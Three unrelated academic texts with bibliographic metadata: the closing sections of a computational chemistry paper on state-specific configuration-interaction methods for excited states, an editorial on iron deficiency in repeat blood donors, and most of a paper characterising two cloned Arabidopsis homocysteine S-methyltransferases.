CCSD while sharing the same O(N^6) computational scaling, and more accurate than CC2, though it remains less black-box and more expensive than the O(N^5)-scaling CC2. Overall, the present statistics position our state-specific approaches as encouraging alternatives for describing larger systems, despite the remaining issues regarding higher-lying excited states. The MAEs of the seven variants of Davidson corrections, separated by type of excitation, are presented in Table S3 of the Supporting Information. We recall that different basis sets have been used (the aug-cc-pVDZ basis set for systems with up to three non-hydrogen atoms and the 6-31+G(d) basis set for the larger ones), which could have some impact on the trends as a function of system size for a given method. Despite the different basis sets, the comparison between different methods for a given system size remains valid.
E. Specific Applications. Butadiene, glyoxal, C2, and C3 are particularly interesting and challenging systems that deserve a dedicated discussion. The excitation energies are gathered in Tables 6, 7, 8, and 9, respectively. The 2 1 A g dark state of butadiene was long assigned as a doubly excited state. 111,112 More recently, though, it has been reassigned as a singly excited state, 113 meaning that the doubly excited determinants actually represent strong orbital relaxation effects (single excitations from the dominant singly excited determinant). Here, our state-specific results (shown in Table 6) support this interpretation, since one CSF associated with a single excitation provided reasonable excitation energies, whereas attempts to employ a doubly excited reference produced much higher-lying solutions. At the ΔCSF level, we obtained an excitation energy (7.18 eV) comparable to the much more expensive CCSD (7.20 eV), although still overestimating the CCSDTQ reference value of 6.56 eV. 99 This result demonstrates the ability of ΔCSF to capture orbital relaxation effects at only a mean-field cost, whereas EOM-CC needs at least double excitations to do the same. The inclusion of correlation at the ΔCISD level brings the excitation energy down to 6.93 eV. An important question in butadiene concerns the energy gap between the 2 1 A g dark state and the lower-lying 1 1 B u bright state, whose correct ordering has only recently been settled. 114 Taking the CCSDTQ reference value of 0.15 eV for the energy gap, 99 we observe that EOM-CC methods considerably overestimate it (0.94 eV in CC2 and 0.65 eV in CCSD), whereas the state-specific methods deliver improved results (0.65 eV in ΔCSF and 0.39 eV in ΔCISD). (Table 6 notes: the reference method is CCSDTQ; 100 only the lowest-lying optically bright (1 1 B u ) and dark (2 1 A g ) states and their energy gap are compared here, while seven more computed states can be found in the Supporting Information; b marks an intruder state problem for that state.)
Another challenging system is glyoxal, which presents excited states of genuine multireference character. 115 While the first pair of NTOs has a dominant weight, the second pair is non-negligible. In this sense, most of the first excited states of glyoxal lie between the cases of most singly excited states (that can be qualitatively described with one CSF) and those that need two CSFs. Being an intermediate case, here we performed ΔCISD calculations with references containing one or two CSFs, for the first two singlet states and the first four triplet states (results presented in Table 7). With one CSF only, ΔCSF typically overestimates the reference excitation energies, with the corresponding ΔCISD improving the overall comparison. For this set of six excited states, the associated MAEs are 1.14 eV for ΔCSF and 0.65 eV for ΔCISD when using a single CSF as the reference. Despite the improvement at the CISD level, this is still limited by the lack of an actual multiconfigurational reference for these states. When two CSFs are employed as the reference for the excited states, the MAEs are reduced to 0.58 eV (ΔCSF) and 0.22 eV (ΔCISD), which can be further decreased to 0.08 eV with ΔCISD+PC. We thus recommend augmenting the excited-state reference whenever it displays at least some multireference character, and the weight of the first pairs of NTOs could serve as an easy proxy for this.
Finally, we comment on the lowest-lying 1 1 Δ g and higher-lying 2 1 Σ g + doubly excited states of C2 and C3, which would require at least CCSDTQ-quality calculations to become accurate to within 0.1 eV. 25 C2 displays a strong multireference ground state, and thus we employed two CSFs as the reference: the closed-shell HF determinant and the determinant associated with the (σ2s*)² → (σ2pz)² transition. For its doubly excited states, we employed the two CSFs needed to describe both doubly excited states generated from the HF determinant through the (π2px)² → (σ2pz)² and (π2py)² → (σ2pz)² excitations, with π2px and π2py being degenerate orbitals. In C3, the multireference character of the ground state is weaker, and thus we adopted a single HF determinant as the reference. In turn, four CSFs are needed for its doubly excited states, built from the HF determinant by performing (σg)² → (π2px*)², (σg)² → (π2py*)², (σu)² → (π2px*)², and (σu)² → (π2py*)² transitions, where π2px* and π2py* are degenerate orbitals. We therefore reassign the doubly excited states of C3 as (σ)² → (π*)², which had first been assigned as (π)² → (σ*)². 25 Notice that, for both systems, what differentiates 1 1 Δ g and 2 1 Σ g + is essentially the phase between the two CSFs differing by the occupation of the degenerate orbitals (π in C2, π* in C3). Thus, the higher-lying state orbitals were obtained by optimizing for the second CI root associated with the reference (two CSFs in C2, four in C3). The computed excitation energies of C2 and C3 are shown in Tables 8 and 9, respectively. We found that ΔCISD is more accurate than CCSDT for C2 and even more accurate than CCSDTQ for C3.
V. CONCLUSIONS
Here we have presented and benchmarked a particular state-specific realization of MCSCF and MRCI as a route to perform excited-state calculations. The orbitals are optimized for a targeted state with a minimal set of CSFs, which serves as the reference wave function for the CI calculations; these can be further corrected with Epstein-Nesbet perturbation theory or with a posteriori Davidson corrections. We surveyed these methods against more established alternatives by computing excitation energies for a broad set of molecules and types of excitations from the QUEST database. State-specific CI was found to be substantially more accurate than the standard CI methods based on a ground-state reference. Importantly, it delivers reliable results across different types of excited states, most notably when comparing singly and doubly excited states, and can easily handle ground and excited states of a multireference nature. The overall accuracy of ΔCISD rivals that of CC2 (MAEs of 0.17 to 0.18 eV), whereas ΔCISD+EN2 is comparable to CCSD (MAEs of 0.08 eV), with ΔCISD+Q lying in between (MAEs of 0.10 to 0.12 eV). For larger systems, ΔCISD+Q leads to more accurate results (MAEs of 0.07 to 0.09 eV) than CC2 and CCSD (MAEs of 0.10 to 0.12 eV).
There are many exciting possibilities to be pursued from this work. One is to develop analogous state-specific coupled-cluster methods. In light of the huge improvement we have observed when going from ground-state-based to state-specific CI, we expect a similar gain when comparing EOM-CC to state-specific CC methods where tailored CSFs are employed as the reference wave function. 116−118 One could also develop state-specific implementations of seniority-based 92 and hierarchy-based 93 CI for excited states. It would be important to assess the performance of our state-specific approaches for charge-transfer states and even larger systems, which would require switching from a determinant-driven to an integral-driven implementation. In addition, it remains to be seen how the methods presented here behave away from the equilibrium geometry, particularly in strong correlation regimes. Although evaluating nonorthogonal matrix elements is more challenging than their orthogonal analogs, the calculation of static properties such as dipole moments and oscillator strengths is possible thanks to the recent generalized extension of the nonorthogonal Wick's theorem proposed by Burton. 119,120 Yet another exciting possibility is to move from a state-specific to a state-averaged reference while contemplating only a small set of important determinants for describing a given set of states. We recall that the very compact reference wave function employed here is what currently limits the ΔCI method to relatively low-lying excited states. For instance, missing important determinants in the reference space gives rise to the intruder states encountered in some of the ΔCISD+EN2 calculations. In particular, including the Aufbau closed-shell determinant in the reference should improve the case of fully symmetric excited states. More generally, when two states of the same symmetry are strongly coupled, a larger reference should be considered as well. These issues are expected to become more prominent at higher energies, due to the increasing number of excited states. Developments toward more suitable reference wave functions could enable the ΔCI method to target higher-lying excited states.
Supporting Information. Additional statistical measures for different sets of excited states and for all flavors of the ΔCISD+Q models (PDF). For the full set of 294 excited states: total energies and excitation energies obtained with ΔCSF, ΔCISD, ΔCISD+EN2, and the 7 variants of the ΔCISD+Q models; excitation energies computed with CIS, CIS(D), CC2, and CCSD; the number of determinants in the reference and the saddle point order associated with the ΔCSF solutions; the reference excitation energies and corresponding methods; and additional statistical measures. For a subset of 16 excited states: total energies and excitation energies obtained at the ΔCISDT, ΔCISDTQ, and ground-state-based CISDT and CISDTQ levels of theory. For the subset of 10 doubly excited states: excitation energies obtained at the CC3, CCSDT, CC4, and CCSDTQ levels of theory (XLSX). | 2022-11-08T06:42:53.814Z | 2022-11-06T00:00:00.000 | {
"year": 2023,
"sha1": "ae9639859b326f6c76685fceee40acfb3ab7a596",
"oa_license": "CCBYNCND",
"oa_url": "https://pubs.acs.org/doi/pdf/10.1021/acs.jctc.3c00057",
"oa_status": "HYBRID",
"pdf_src": "PubMedCentral",
"pdf_hash": "3f97e8eda3b70426bd8cb2a5331c92e3fdd84234",
"s2fieldsofstudy": [
"Chemistry"
],
"extfieldsofstudy": [
"Medicine",
"Physics"
]
} |
19731154 | pes2o/s2orc | v3-fos-license | Blood donation, blood supply, iron deficiency and anemia - it is time to shift attention back to donor health
Since the 1980s blood collectors worldwide have focused on two central themes: blood product safety and an adequate blood supply. From the standpoint of safety, specifically the reduction of transfusion-transmitted diseases, the achievements over the past quarter century are remarkable. With respect to the adequacy of the blood supply, the past decade has witnessed major gains in some countries of Europe, Canada and the US and less than had been expected in others, including Brazil, where the challenge of achieving a more stable blood supply, in which supply and demand are in better balance, remains an important issue(1).
On the other hand, the aforementioned achievement has come at a price: iron depletion of the repeat blood donor. Blood centers have long recognized that it is more effective and less expensive to collect blood from existing donors than to recruit new donors. While first-time donors, particularly the young and minorities, have been more successfully recruited, 70% of US and 40-70% (depending on the region) of Brazilian donors are repeat donors(1,2).
The only known significant disadvantage of blood donation is the potential risk of iron deficiency (ID). Iron is a vitally important element in human metabolism. It plays a central role in erythropoiesis and is also involved in many other intracellular processes in all the tissues of the body. The capacity of the individual donor to give blood without developing ID and iron deficiency anemia (IDA) varies widely, probably due to differences in nutritional iron intake, the prevalence of ID in each study population, menstrual iron loss in females, the frequency of blood donation and the use of supplemental iron(2).
The frequency of ID is high in blood donors (1.8% to 8.4% in males and 4.5% to 34.8% in females), and more dependent on the frequency of donations than on the cumulative number of donations(2,4). In addition, ID is a significant problem and its prevalence is increasing in many countries around the world. The prevalence has been reported to be 9-40% in women, depending on age and menstrual status, and 2-5% in men(1,2). Because menstruating females begin their blood donation careers from a lower starting point, subsequent donations pose a risk of greater clinical harm. Females have much higher rates of both ID and IDA. The clinical implications of ID and IDA are significant, including fatigue, reduced work performance and intellectual capacity, reduced endurance, restless leg syndrome, pica, and cognitive and immune function changes. The degree of symptomatology is proportionate to the severity of the anemia(1,2).
Moreover, low hemoglobin (Hb) accounts for 4-10% of total deferrals, with the vast majority occurring in women. It therefore seems reasonable to secure adequate iron reserves in the donor population in order to maintain an appropriate donation capacity and to avoid possible hematological and non-hematological complications related to ID(1,2).
The question that arises is whether this practice is in the best interest of donor health. In this issue of Revista Brasileira de Hematologia e Hemoterapia, Silva et al., representing the Hemocentro Regional de Uberaba, Minas Gerais, Brazil, have brought this issue to light(5).
Given the findings in this and other studies, what measures can blood collectors pursue to address iron depletion? There is no single answer, but several approaches should be considered: 1) modifying the donor Hb requirements and measurement of Hb, 2) changing the interdonation interval, 3) testing for serum ferritin, and 4) iron supplementation.
Modifying donor Hb requirements and measurement of Hb
The current minimum Hb requirement in the Brazilian guidelines, as well as in the European Union guidelines, is 12.5 g/dL for females and 13.0 g/dL for males; these values seem to be reasonable(6,7). However, we know that IDA is the last stage of ID, and it is evident that Hb measurement alone is inadequate to detect blood donors with ID but without anemia. It is not surprising that the current practice results in accepting many iron-depleted female donors who have normal Hb values(2).
Changing the interdonation interval
With respect to the interdonation interval and iron status, the number of donations over the previous 2 years was the most significant indicator of ID and IDA in the RISE study(8). For females, there were no significant differences in deferral rates if 15 weeks had elapsed since the last donation, but there were highly significant differences between weeks 8 and 14. On the other hand, there was an insufficient number of males for evaluation. It is noteworthy that, over time with successive donations, the Hb decreased as well, such that the proportion of female donors with values below 12.5 g/dL increased from 11% to 25%, while men showed a trend toward significance, with an increase from 1% to 5%. These findings highlight the point that the current standard of 8 weeks is insufficient to replenish iron stores(8).
Thus, one option to mitigate the effects of blood donation on ID would be to increase the interdonation interval for donors of whole blood from the current eight weeks to at least 12 weeks. Such a change would have an impact on blood donor scheduling, but it is worth mentioning that several European countries that recognized the anemia problem limit annual whole blood donations (four and three for males and females, respectively) and have adopted a minimum interdonation interval of 12 weeks for whole blood(1,8).
Testing for serum ferritin
Assessing serum ferritin (SF) levels would be the most accurate way to assess "iron health". However, testing for SF poses significant challenges. Besides the moderate expense of the test, issues such as collecting additional samples, determining the frequency of testing and handling donor counseling would need to be solved. Another drawback is that results are not readily available to make a decision on site(9).
Iron supplementation
Every blood donation (450 ± 25 mL) is associated with a significant iron loss of approximately 200 to 230 mg, and the lost iron is not readily replenished. Even with iron-rich diets and excellent compliance, six months or longer are necessary to positively impact SF levels. Therefore, diet alone is inadequate in the scenario of blood donation(2,9).
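The 200-230 mg figure can be cross-checked from first principles. The sketch below assumes a whole-blood hemoglobin of 13-15 g/dL and roughly 3.4 mg of elemental iron per gram of hemoglobin; neither constant comes from the editorial itself.

```python
# Back-of-the-envelope check of the ~200-230 mg iron loss per donation.
# Assumed constants (not from the editorial): Hb of 13-15 g/dL and
# ~3.4 mg elemental iron per gram of hemoglobin.
DONATION_ML = 450
FE_PER_G_HB_MG = 3.4

for hb_g_per_dl in (13.0, 15.0):
    hb_g = DONATION_ML / 100 * hb_g_per_dl   # grams of Hb in the unit
    fe_mg = hb_g * FE_PER_G_HB_MG            # iron removed with the unit
    print(f"Hb {hb_g_per_dl} g/dL -> ~{fe_mg:.0f} mg iron")
# Hb 13.0 g/dL -> ~199 mg iron; Hb 15.0 g/dL -> ~230 mg iron
```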
Recent studies in blood donors have shown that short-term (4- to 8-week course) use of oral iron supplementation at 100-300 mg daily of elemental iron (and even at lower doses such as 20-40 mg/day) is effective in improving Hb levels, in replacing iron loss after blood donation even in menstruating females, in maintaining SF concentrations in a range of 50 to 80 µg/L and in significantly reducing blood donation deferral. Thus, low-dose iron (100 mg/day) administered for up to 60 days post-donation appears to be a sound and feasible strategy(10)(11)(12).
Conclusions and recommendations
The fact that blood donation results in iron depletion is old news to the transfusion medicine community and many recent studies stress how serious and prevalent ID is among blood donors. With greater appreciation of the clinical consequences of ID, both physical and intellectual, this issue must move to center stage and the transfusion medicine community has an obligation to address this matter.
While there is no question that the donor pool needs to be more robust to meet both current and future demand, concerns about the blood supply must take donor health into consideration.
It is time to discuss more profoundly the possible approaches to address iron depletion in blood donors. It is time to shift attention back to donor health, which is indeed no less important than ensuring a safe blood supply.
"year": 2012,
"sha1": "69c0fd01a3b6af4e868ee172cb31c00d3b3b30de",
"oa_license": "CCBYNC",
"oa_url": "https://europepmc.org/articles/pmc3486820?pdf=render",
"oa_status": "GREEN",
"pdf_src": "PubMedCentral",
"pdf_hash": "69c0fd01a3b6af4e868ee172cb31c00d3b3b30de",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
31545213 | pes2o/s2orc | v3-fos-license | Characterization and Functional Expression of cDNAs Encoding Methionine-sensitive and -insensitive Homocysteine S-Methyltransferases from Arabidopsis *
Plants synthesize S-methylmethionine (SMM) from S-adenosylmethionine (AdoMet) and methionine (Met) by a unique reaction and, like other organisms, use SMM as a methyl donor for Met synthesis from homocysteine (Hcy). These reactions comprise the SMM cycle. Two Arabidopsis cDNAs specifying enzymes that mediate the SMM → Met reaction (SMM:Hcy S-methyltransferase, HMT) were identified by homology and authenticated by complementing an Escherichia coli yagD mutant and by detecting HMT activity in complemented cells. Gel blot analyses indicate that these enzymes, AtHMT-1 and -2, are encoded by single copy genes. The deduced polypeptides are similar in size (36 kDa), share a zinc-binding motif, lack obvious targeting sequences, and are 55% identical to each other. The recombinant enzymes exist as monomers. AtHMT-1 and -2 both utilize L-SMM or (S,S)-AdoMet as a methyl donor in vitro and have higher affinities for SMM. Both enzymes also use either methyl donor in vivo because both restore the ability to utilize AdoMet or SMM to a yeast HMT mutant. However, AtHMT-1 is strongly inhibited by Met, whereas AtHMT-2 is not, a difference that could be crucial to the control of flux through the HMT reaction and the SMM cycle. Plant HMT is known to transfer the pro-R methyl group of SMM. This enabled us to use recombinant AtHMT-1 to establish that the other enzyme of the SMM cycle, AdoMet:Met S-methyltransferase, introduces the pro-S methyl group. These opposing stereoselectivities suggest a way to measure in vivo flux through the SMM cycle.
Plants synthesize SMM from AdoMet and Met in a reaction mediated by AdoMet:Met S-methyltransferase (MMT, EC 2.1.1.12) (1-3). SMM can then serve as a methyl donor for the synthesis of Met from homocysteine (Hcy), catalyzed by Hcy S-methyltransferase (HMT, EC 2.1.1.10). The tandem action of MMT and HMT, plus that of S-adenosylhomocysteine (AdoHcy) hydrolase, constitutes the SMM cycle (Fig. 1). Although MMT and the SMM cycle are unique to plants, HMT occurs in bacteria, yeast, and mammals, enabling them to catabolize SMM of plant origin and providing an alternative to the methionine synthase reaction as a means to methylate Hcy (4-7).
In wheat and other plants, SMM is synthesized in leaves and transported via the phloem to developing seeds where it can be used to methylate Hcy (8). SMM is also synthesized by morning glory flower buds and then used to methylate Hcy during blooming (9). The halves of the SMM cycle can thus sometimes be separated in space or time. However, both halves may also operate concurrently in the same tissue, and in these cases the cycle has been hypothesized to remove excess AdoMet (3). Testing this hypothetical homeostatic role, which is analogous to that of the cyclic methylation/demethylation of Gly in mammalian liver (10), requires determination of flux through the SMM cycle in defined tissues in vivo. Methods to do this are lacking.
The first enzyme of the SMM cycle, MMT, has been purified from Wollastonia biflora and barley, and characterized (2,11). MMT cDNAs have been isolated from W. biflora, Arabidopsis, and maize, and the two latter plants have been shown to have one MMT gene (8). Much less is known about plant HMTs, and none has been cloned from plants or other eukaryotes. HMT was partially purified from jack beans and germinating peas (12,13) and shown to be stereoselective for one of the two methyl groups of SMM (the pro-R methyl) (14). The preparations obtained used either SMM or AdoMet as methyl donor; it was not established whether both activities reside on the same protein. These data appear to indicate that plants can bypass SMM by recycling AdoMet methyl groups directly to Met (Fig. 1, dotted arrows). However, the AdoMet substrates used in these experiments most probably contained significant levels of the nonphysiological R,S diastereomer (15), and it has been suggested that this, not the physiological S,S form, is the substrate for HMTs (7). The form of AdoMet that plant HMTs utilize is therefore unclear. Neither jack bean nor pea HMT was strongly inhibited by Met (≤25% inhibition by 10 mM Met; Refs. 12 and 13), which contrasts with the Met sensitivity of the yeast enzyme (12).
Recently, the Escherichia coli YagD protein was shown to be an HMT, and a similar enzyme, selenocysteine Se-methyltransferase (SeCysMT), was characterized and cloned from the selenium-accumulating plant Astragalus bisulcatus (7,16,17). These enzymes share significant primary sequence homology (7) and have a GGCC motif near the C terminus. The cysteine residues in this motif have been implicated in zinc binding in two other enzymes that catalyze methyl transfers to Hcy, E. coli B12-dependent Met synthase and mammalian betaine-Hcy methyltransferase (18,19). The enzyme-bound zinc is required to activate the thiol group of Hcy for nucleophilic attack (18).
In this work, we identified two Arabidopsis homologs of YagD and confirmed that they encode HMTs. The recombinant enzymes were partially characterized, with emphasis on clarifying their substrate specificity and sensitivity to Met. We also surveyed the genomic complexity of HMT genes in Arabidopsis and used the known stereoselectivity of HMT to establish that of the other enzyme of the SMM cycle, MMT. The results of the stereospecificity study suggest a novel approach to determining flux through the SMM cycle in vivo.
Separation of AdoMet Diastereomers-The S,S (biologically active) and R,S (inactive) diastereomers of AdoMet were separated by HPLC essentially as described by Beaudouin et al. (22). Analytical scale separations of [methyl-14C]AdoMet and unlabeled AdoMet were made on a 1 × 150 mm Reliasil C18 column using a microbore HPLC system (UMA model, Michrom Bioresources, Auburn, CA). Solvent A was water containing 0.1 M sodium acetate, 20 mM citric acid, 0.93 mM octanesulfonic acid, and 0.12 mM EDTA; solvent B was methanol, and the gradient was from 100 to 95% solvent A in 45 min. The elution profile was monitored at 258 nm. The [methyl-14C]AdoMet contained no detectable R,S form (1% or less) and was used without further purification. As previously reported (15), unlabeled AdoMet was found to contain ≈15% of the R,S isomer. In the few cases (see "Results") in which unlabeled AdoMet was included in enzyme assays, specific radioactivity calculations were based on its (S,S)-AdoMet content.
cDNA Generation, Sequencing, and Sequence Analysis-Arabidopsis expressed sequence tags, GenBank accession numbers T46013 and H37463 (encoding AtHMT-1 and -2, respectively), were obtained from the Arabidopsis Biological Resource Center (Columbus, OH). The ≈750-base-pair insert in H37463, which is truncated at the 5′ end, was used to isolate a full-length cDNA from an Arabidopsis (ecotype Landsberg erecta) leaf library in the Uni-Zap XR vector (Stratagene) (provided by T. L. Thomas, Texas A&M University). DNA sequencing procedures were as described (8). Sequence alignments were made using Clustal W 1.7 (27); phylogenetic analysis was carried out using the Darwin system at the ETH server. Homology searches were made using BLAST programs (28).
cDNA Expression in E. coli-HMT coding sequences were amplified from plasmid templates by high fidelity polymerase chain reaction using recombinant Pfu DNA polymerase (Stratagene). The primers included the first or last 6-7 codons plus restriction sites for cloning into pBluescript SK- and, for the forward primers, a Shine-Dalgarno sequence preceded by a stop codon in frame with the LacZ protein encoded by the vector. The AtHMT-1 primers were 5′-CGGAATTCTTGAAGGAAACAGCTATGGTTTTGGAGAAAAAATC-3′ (forward) and 5′-CCCAAGCTTTCATCTTCGTTTCAAATCTC-3′ (reverse); the AtHMT-2 primers were 5′-AAAACTGCAGGTGAAGGAAACAGCTATGACCGGAAACTCTTTTAAC-3′ (forward) and 5′-CGGGGTACCCTAAAGAGATCTGCGGTTGAC-3′ (reverse). After ligation into pBluescript, constructs were introduced into E. coli strain DH10B by electroporation. Plasmid preparations were sequenced to verify the inserts and used to transform E. coli strain MTD123 by electroporation.
Enzyme Isolation and Molecular Mass Determination-E. coli cultures (50 ml) were grown to an A600 of 0.6-1 in LB medium (24) containing 100 µg ml⁻¹ ampicillin and 1 mM isopropyl-1-thio-β-D-galactopyranoside. Cells were harvested by centrifugation (4000 × g, 10 min, 4°C), washed in buffer A (100 mM Hepes-KOH, pH 7.5, 1 mM DTT, 10% glycerol), recentrifuged, frozen in liquid N2, and stored until extraction at −80°C. Subsequent operations were at 0-10°C. Cells were resuspended in buffer A (5 ml/50-ml culture) and broken by sonication; the extract was cleared by centrifugation (10,000 × g, 15 min) and used for enzyme assays directly or after desalting on PD-10 columns (Amersham Pharmacia Biotech) equilibrated in buffer A. Extracts were routinely stored at −80°C after freezing in liquid N2; this was shown not to affect HMT activity. Yeast extracts were prepared as described previously (26) using buffer A. Native molecular masses were estimated using a Waters 626 HPLC system equipped with a Superdex 200 HR 10/30 column (Amersham Pharmacia Biotech); reference proteins were cytochrome c, carbonic anhydrase, bovine serum albumin, and β-amylase. Protein was estimated by Bradford's method (29) using bovine serum albumin as standard.
Enzyme Assays-Unless otherwise indicated, assays were made under conditions in which substrates were saturating and product formation was proportional to enzyme level and time. The assays were modifications of that described by Mudd.
Electrospray Mass Spectrometry-The [13C]Met formed by the sequential action of MMT and HMT was analyzed on a FinniganMAT LCQ (Thermoquest, San Jose, CA) mass spectrometer system. The source voltage was set at 3.5 kV and capillary voltage at 30 V; the capillary temperature was 22°C. Background source pressure was ≈1.5 × 10⁻⁵ torr as read by an ion gauge. The sample flow rate was 10 µl min⁻¹. The drying gas was N2. The LCQ was scanned to 2000 atomic mass units. Spectra were acquired for 0.5 min. Samples were dissolved in 50 µl of water; 25 µl was injected into the mass spectrometer.
DNA Gel Blot Analyses-Arabidopsis genomic DNA was isolated from leaves as described (30). Five-µg samples of the isolated DNA were digested, separated in 0.7% agarose gels, and transferred to supported nitrocellulose membrane (Nitropure, MSI) as described (24). Blots were hybridized overnight at 58°C in 5× SSC, 5× Denhardt's solution, 1% SDS, 1 mM EDTA, and 100 µg ml⁻¹ sonicated salmon sperm DNA and washed at low stringency (1× SSC, 0.1% SDS, 37°C). The probes were the full-length AtHMT-1 or -2 cDNAs and were labeled with ³²P by the random primer method. Radioactive bands were detected by autoradiography.
RESULTS
Genomic-based Cloning of HMT cDNAs from Arabidopsis-BLAST searches using the amino acid sequence of E. coli YagD detected two sets of homologous Arabidopsis expressed sequence tags. Sequencing one insert from each set (GenBank accession numbers T46013 and H37463) established that they represent two distinct transcripts. The T46013 insert encodes a 326-residue (36.0 kDa) polypeptide, designated AtHMT-1. The H37463 insert encodes only the C-terminal part of a polypeptide and so was used to isolate the corresponding full-length cDNA from an Arabidopsis leaf library. This cDNA specifies a 333-residue (36.4 kDa) polypeptide, designated AtHMT-2. The deduced AtHMT-1 and -2 proteins are 55% identical to each other, 50 (AtHMT-1) or 68% (AtHMT-2) identical to Astragalus SeCysMT, and 24-41% identical to YagD and two yeast proteins, Ypl273w and Yll062c, that were shown to be HMTs while our work was in progress (Fig. 2). 2 AtHMT-1 and -2 also share significant sequence identity (20-26%) with the N-terminal region of E. coli B12-dependent Met synthase and with mammalian betaine-Hcy methyltransferase (not shown). AtHMT-1 and -2 both have a GGCC zinc-binding motif near the C terminus, as well as a third conserved cysteine sited 65 residues upstream that may also be a zinc ligand (18,19). Both AtHMT-1 and -2 appear to lack targeting sequences (e.g. chloroplast or mitochondrial transit peptides), indicating that they are cytosolic enzymes. (Fig. 2 legend, recovered in part: the asterisk marks a third conserved cysteine residue; AtHMT-1 and -2, Arabidopsis HMT-1 and -2; YagD, E. coli YagD (BAA12002); Yll062c, S. cerevisiae Yll062c (S50958); Ypl273w, S. cerevisiae Ypl273w (S65306); SecysMT, A. bisulcatus selenocysteine Se-methyltransferase (CAA10368).)
Complementation of an E. coli yagD Mutant and Detection of HMT Activity-The coding regions of AtHMT-1 and -2 were subcloned into pBluescript SK-. To express the HMTs as native proteins and not LacZ fusions, the coding sequences were preceded by a stop codon in frame with LacZ and a Shine-Dalgarno sequence. These constructs were introduced into E. coli strain MTD123 (ΔyagD ΔmetE ΔmetH), which lacks Met synthase and HMT activity and is consequently a Met auxotroph that cannot grow on SMM (16). Both constructs enabled transformants to grow on SMM (Fig. 3A); no transformants grew on medium without SMM, indicating complementation of the yagD mutation and not the metE or metH mutations (not shown). No complementation was observed with the vector alone (Fig. 3A), and retransforming MTD123 with rescued plasmids containing the AtHMT-1 or -2 cDNAs restored the ability to grow on SMM, showing that the complementation is due to the encoded plant protein. HMT activity was readily detected in extracts of the complemented strains but not, as expected, in cells transformed with the vector alone (Fig. 3B). The specific activity of AtHMT-1 was ≈10-fold higher than that of AtHMT-2; this difference was observed consistently in independent experiments. To authenticate the observed activities, the [35S]Met reaction products were verified by TLC (Fig. 3C).
Methyl Acceptor Specificity of AtHMT-1 and -2-We compared the ability of AtHMT-1 and -2 to catalyze methyl transfer from L-SMM to various thiols and related compounds, using L-Hcy as the benchmark (Table I). Both enzymes utilized D-Hcy, although AtHMT-1 showed a marked preference for the L form. A similar lack of stereospecificity toward Hcy has been noted for other HMTs (7, 31). AtHMT-1 showed significant activity with L-and D-cysteine, which is noteworthy as cysteine is not a substrate for E. coli or yeast HMTs (7,31). Neither enzyme attacked DL-selenocysteine (Table I), glutathione, coenzyme A, sulfide, or thiocyanate (not shown).
Methyl Donor Specificity of AtHMT-1 and -2-SMM occurs in plants as the L enantiomer (8), and AtHMT-1 and -2 both proved to be specific for this form: with 20 µM D- or L-[1-14C]SMM and 2 mM L-Hcy as substrates, activities with D-SMM were undetectable (<3% of those with L-SMM). To compare L-SMM and (S,S)-AdoMet as methyl donors, Michaelis constants and relative Vmax values were determined for both enzymes (Table II). (S,S)-AdoMet was found to be a methyl donor for both enzymes, but the Km values were higher than for L-SMM (67-fold for AtHMT-1 and 4.5-fold for AtHMT-2) and the Vmax values were lower. The (S,S)-[methyl-14C]AdoMet used in these experiments contained no detectable (≤1%) R,S diastereomer and, in the assay conditions used (pH 7.5, 30 min), ≤0.3% (R,S)-AdoMet is expected to form by racemization (15). (R,S)-AdoMet therefore did not contribute significantly to the observed activities. Because SMM and (S,S)-AdoMet are substrates, Km values for L-Hcy were determined with both (Table II); fairly similar values were obtained with both methyl donors and with both enzymes. To screen for other potential methyl donors, unlabeled compounds were tested for their ability to inhibit methyl transfer from [35S]SMM when added to assays in 5-fold molar excess. Glycine betaine, choline, phosphocholine, DMSP, and 5-methyltetrahydrofolate had little effect on either enzyme (≤13% inhibition; data not shown), making it unlikely that they are significant methyl donors.
Met Sensitivity and Other Biochemical Properties of AtHMT-1 and -2-With either L-SMM or (S,S)-AdoMet as a methyl donor, AtHMT-1 activity showed strong product inhibition by L-Met, whereas AtHMT-2 did not, being almost unaffected by L-Met concentrations in the physiological range (≤500 µM) (Fig. 4). AtHMT-1 and -2 both showed maximal activity at pH 7.5. Neither was stimulated by Zn²⁺ (0.1 or 1 mM). AtHMT-1 activity was modestly inhibited by 1 mM EDTA (26%); AtHMT-2 activity was not. The molecular masses of the native AtHMT-1 and -2 enzymes were estimated by size exclusion chromatography to be 36 kDa. This indicates that both enzymes exist as monomers, as do other HMTs and SecysMT (7,17,31).
Complementation of Yeast HMT Mutations-Yeast cells take up SMM and AdoMet and metabolize them to Met via the action of HMT (5,6). Disruption of the open reading frames yll062c (MHT1) and ypl273w (SAM4) (Fig. 2) has demonstrated that they specify HMTs that prefer SMM and AdoMet, respectively. 2 A triple disruptant (CY61-1D) lacking Met synthase as well as both HMTs is consequently a Met auxotroph that cannot use SMM or AdoMet in place of Met. To confirm that AdoMet and SMM serve as methyl donors for AtHMT-1 and -2 in vivo, each was expressed in CY61-1D and the transformants were tested for the ability to grow on SMM or AdoMet (Fig. 5) (this type of experiment cannot be carried out in E. coli because it cannot absorb AdoMet). AtHMT-1 and -2 enabled growth on either compound, establishing that SMM and AdoMet are indeed substrates for both enzymes in vivo as well as in vitro. To exclude the possibility that the differing Met sensitivities shown in Fig. 4 are an artifact of expression in E. coli, SMM:Hcy S-methyltransferase activity was assayed in desalted extracts of yeast transformants expressing AtHMT-1 and -2. As with the recombinant enzymes from E. coli, AtHMT-1 was inhibited strongly by L-Met (92% at 500 µM L-Met), whereas AtHMT-2 was not. Activities without L-Met were 1.9 and 1.8 nmol min⁻¹ mg⁻¹ protein for AtHMT-1 and -2, respectively; these nearly equal values contrast with the ≈10-fold difference seen when these enzymes are expressed in E. coli (Fig. 3B). These data suggest that AtHMT-2 may be less stable (or synthesized more slowly) than AtHMT-1 in the bacterial host. (Fig. 5 legend, recovered in part: "... (1), the met6 ypl273 yll062 mutant CY61-1D (2), and CY61-1D transformed with pVT102-L containing AtHMT-1 (3) or AtHMT-2 (4), or alone (5) were plated on minimal medium containing 0.1 mM Met, L-SMM, or AdoMet. The AdoMet used was not purified to remove the R,S diastereomer, because in the conditions used, this forms continuously in the medium from racemization of (S,S)-AdoMet (15).")
